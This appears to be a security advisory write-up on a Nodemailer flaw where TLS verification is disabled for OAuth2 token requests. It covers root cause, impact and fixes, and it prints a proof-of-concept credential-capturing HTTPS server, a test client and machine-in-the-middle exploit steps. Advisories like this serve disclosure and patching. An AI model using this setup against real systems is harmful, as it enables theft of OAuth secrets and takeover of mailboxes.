Listen to this Post
– how GHSA‑r7g4‑qg5f‑qqm2 works
Nodemailer is a popular Node.js module that simplifies sending emails from applications.
To obtain OAuth2 tokens (e.g., for Gmail or other providers), Nodemailer performs
outbound HTTPS requests using an internal HTTP/HTTPS fetch client implemented in
`lib/fetch/index.js`.
Root cause
Inside `lib/fetch/index.js`, the HTTPS request options explicitly set
rejectUnauthorized: false. This directive disables all TLS certificate verification
for every request made through that internal client:
- Self‑signed certificates are accepted without warning.
- Invalid certification authority (CA) chains are trusted.
- Hostname validation is completely bypassed.
- Any endpoint – even attacker‑controlled ones – is treated as legitimate.
Vulnerable flow
When an application uses OAuth2 authentication, the vulnerable chain is triggered:
1. OAuth2 Transport – The application configures Nodemailer with OAuth2 credentials.
2. XOAuth2 token generation – Nodemailer tries to obtain or refresh an access token.
3. Internal HTTPS fetch client – The request is handed to lib/fetch/index.js.
4. Request with `rejectUnauthorized: false` – TLS validation is disabled.
5. Attacker‑controlled endpoint trusted – A machine‑in‑the‑middle (MITM) can present an invalid or self‑signed certificate.
6. OAuth credentials transmitted – The OAuth client_secret, refresh_token, and `access_token` are sent over an unverified connection.
Impact
Because TLS verification is disabled, a MITM attacker who can intercept traffic
between the Nodemailer client and the OAuth2 endpoint can:
– Capture OAuth credentials (client secret, refresh token, access token).
– Use those tokens to impersonate the user, read emails, send arbitrary messages, and maintain persistent access.
– Tamper with OAuth responses, injecting malicious tokens or modifying expiry times.
The flaw effectively downgrades HTTPS security guarantees for sensitive OAuth
exchanges, making them vulnerable to straightforward interception attacks.
DailyCVE Form
Platform: Node.js/npm
Version: ≤8.0.7
Vulnerability: TLS Validation Disabled
Severity: Medium
date: 2026-06-15
Prediction: 2026-06-15
What Undercode Say
1. Generate a self-signed certificate (key.pem, cert.pem) if not available openssl req -x509 -newkey rsa:2048 -nodes -keyout key.pem -out cert.pem -days 1 -subj "/CN=localhost" 2. Start the malicious OAuth2 server (poc/evil-oauth.js) node poc/evil-oauth.js 3. In another terminal, run the Nodemailer OAuth2 test (test.js) node test.js
Malicious HTTPS OAuth server (`poc/evil-oauth.js`)
const https = require('https');
const fs = require('fs');
https.createServer({
key: fs.readFileSync('./key.pem'),
cert: fs.readFileSync('./cert.pem')
}, (req, res) => {
console.log('\n==== REQUEST INTERCEPTED ====');
console.log(req.method, req.url);
let body = '';
req.on('data', chunk => body += chunk);
req.on('end', () => {
console.log('\nPOST BODY:');
console.log(body);
res.writeHead(200, { 'Content-Type': 'application/json' });
res.end(JSON.stringify({ access_token: 'attacker_token', expires_in: 3600 }));
});
}).listen(8443, () => console.log('Malicious HTTPS OAuth server listening on 8443'));
Nodemailer OAuth2 test (`test.js`)
const nodemailer = require('nodemailer');
const transporter = nodemailer.createTransport({
service: 'gmail',
auth: {
type: 'OAuth2',
user: '[email protected]',
clientId: 'CLIENT_ID_REDACTED',
clientSecret: 'CLIENT_SECRET_REDACTED',
refreshToken: 'REFRESH_TOKEN_REDACTED',
accessUrl: 'https://localhost:8443/token'
}
});
transporter.sendMail({
from: '[email protected]',
to: '[email protected]',
subject: 'PoC',
text: 'test'
}, (err, info) => {
console.log('\n==== NODEMAILER RESULT ====');
if (err) console.error(err);
else console.log(info);
});
Exploit
- Attacker sets up a machine‑in‑the‑middle position (e.g., rogue Wi‑Fi, ARP spoofing, compromised router).
- Attacker hosts an HTTPS endpoint with a self‑signed or otherwise invalid certificate.
- When the vulnerable Nodemailer application requests an OAuth2 token (e.g., during login or token refresh), the internal fetch client sends the credentials to the attacker’s endpoint without validating the certificate.
- Attacker logs the intercepted `POST` body containing
client_secret,refresh_token, andaccess_token. - The attacker can now use those tokens to access the victim’s email account, send emails, and maintain persistent access.
Protection
- Immediate fix: Upgrade Nodemailer to version 8.0.8 or later, where `rejectUnauthorized` is no longer hard‑coded to `false` for OAuth2 requests.
- If upgrade is impossible: Override the TLS configuration per transport by setting `tls: { rejectUnauthorized: true }` (or the equivalent per‑attachment option).
- Network mitigation: Enforce strict egress filtering for OAuth2 endpoints (allow only known, trusted IP addresses) and monitor for connections to unexpected or self‑signed endpoints.
- Credential rotation: Rotate OAuth client secrets, refresh tokens, and access tokens after applying the fix.
Impact
- OAuth credential theft – Attacker captures client secret, refresh token, and access token.
- Unauthorized email access – Attacker can read all emails of the compromised account.
- Persistent token abuse – Stolen refresh tokens can be used to obtain new access tokens indefinitely.
- Unauthorized mail sending – Attacker can send emails from the victim’s address.
- Mailbox compromise – Full control over the victim’s mailbox, including contacts and settings.
- Interception/tampering of OAuth responses – Attacker can modify token expiration or inject malicious tokens.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
